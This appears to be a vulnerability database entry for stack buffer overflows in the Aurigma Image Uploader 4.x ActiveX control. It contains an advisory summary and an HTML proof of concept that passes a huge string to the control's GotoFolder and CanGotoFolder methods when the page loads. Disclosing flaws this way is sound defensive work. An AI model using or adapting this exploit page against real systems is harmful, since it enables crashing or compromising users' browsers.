Aurigma Image Uploader 4.x ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Aurigma Image Uploader ActiveX Control Buffer Overflow Vulnerabilitie


                                                source: http://www.securityfocus.com/bid/26537/info

Aurigma Image Uploader ActiveX control is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Versions prior to Aurigma Image Uploader 4.5.70 are affected.

UPDATE (November 26, 2007): Reports indicate that this issue occurs because of a buffer-overflow issue that affects a Win32API method. This has not been confirmed. We will update this BID as more information emerges. 

&#60;html&#62;
 &#60;head&#62;
  &#60;script language=&#34;JavaScript&#34; DEFER&#62;
    function Check() {
    var s = &#34;AAAA&#34;;

     while (s.length &#60; 999999) s=s+s;

     var obj = new ActiveXObject(&#34;Aurigma.ImageUploader.4.1&#34;); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
      obj.GotoFolder(s);
      obj.CanGotoFolder(s);

   }
  &#60;/script&#62;

 &#60;/head&#62;
 &#60;body onload=&#34;JavaScript: return Check();&#34;&#62;
 &#60;/body&#62;
&#60;/html&#62;

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1